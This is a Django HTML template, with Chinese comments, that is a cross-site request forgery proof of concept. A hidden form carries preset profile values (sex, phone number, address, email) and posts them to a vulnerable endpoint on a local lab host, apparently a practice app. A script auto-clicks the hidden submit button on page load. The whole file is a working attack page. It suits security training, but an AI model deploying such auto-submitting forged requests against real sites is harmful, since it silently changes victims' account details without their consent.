<!DOCTYPE html>
<html lang="en">
{% load staticfiles %}
<!--⭐️文件名是post，不是创建的这个页面是post，而是通过侦测POC得知修改是post实现的。-->
<head>
    <meta charset="UTF-8">
    <title>CSRF</title>
    <script src="{% static 'js/jquery.min.js' %}" type="text/javascript"></script>

    <script type="text/javascript">
        window.onload=function()
        {
            //
            // : 直接调用submit() 不能实现自动提交
            //
            // const abc = document.getElementById('transfer');
            // console.log(abc);
            // abc.submit();

            document.getElementById('submitid').click();        //通过submit id获取对象，code可以实现自动click动作
        }
    </script>
</head>
<body>
    <form id="transfer" method="post" action="http://192.168.43.191:8089/vul/csrf/csrfpost/csrf_post_edit.php">
        <input type="hidden" value="Girl" name="sex" id="sex">
        <input type="hidden" value="30000000000" name="phonenum" id="phonenum">
        <input type="hidden" value="China" name="add" id="add">
        <input type="hidden" value="csrf@testing.com.cn" name="email" id="email">
        <input id="submitid" value="submit" type="submit" name="submit" hidden>
    </form>

</body>
</html>
